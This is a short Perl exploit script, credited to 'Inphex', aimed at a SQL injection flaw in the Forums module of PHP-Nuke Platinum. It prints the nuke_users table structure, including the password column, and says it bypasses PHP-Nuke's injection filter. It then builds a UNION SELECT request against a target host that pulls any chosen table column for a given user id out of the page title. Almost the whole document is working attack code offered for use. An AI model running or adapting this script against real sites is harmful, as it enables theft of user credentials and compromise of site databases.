#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id        name    username        user_email      femail  user_website    user_avatar     user_regdate    user_icq        use
r_occ   user_from       user_interests  user_sig        user_viewemail  user_theme      user_aim        user_yim        user_msnm
user_password   storynum        umode   uorder  thold   noscore         bio     ublockon        ublock  theme   commentmax      cou
nter    newsletter      user_posts      user_attachsig  user_rank       user_level      broadcast       popmeson        user_active
        user_session_time       user_session_page       user_lastvisit  user_timezone   user_style      user_lang       user_datefo
rmatuser_new_privmsg    user_unread_privmsg     user_last_privmsg       user_emailtime  user_allowhtml  user_allowbbcode        use
r_allowsmile    user_allowavatar        user_allow_pm   user_allow_viewonline   user_notify     user_notify_pm  user_popup_pm   use
r_avatar_type   user_sig_bbcode_uid user_actkey         user_newpasswd  last_ip         user_color_gc   user_color_gi   user_quickr
eply    user_allow_arcadepm     kick_ban        user_wordwrap   agreedtos       user_view_log   user_effects    user_privs      use
r_custitle      user_specmsg    user_items      user_trade      points  user_cash       last_seen_blocker       user_login_tries
user_last_login_try     user_gender     user_birthday   user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
        $a++;
        while (($k, $v) = each(%cm_n_)) {
                if ($_ eq $k) {
                        ${$v} = $ARGV[$a];
                }
        }
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<ti
tle>(.*?)<\/title>");
sub getit($$)
{
        $url = shift;
        $reg = shift;

        $ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

        if ($content=~m/$reg/) {
            ($f,$s,$l) = split(">>",$1);
            $s =~s/ Post //;
            print $column.":".$s."\n";
        }
}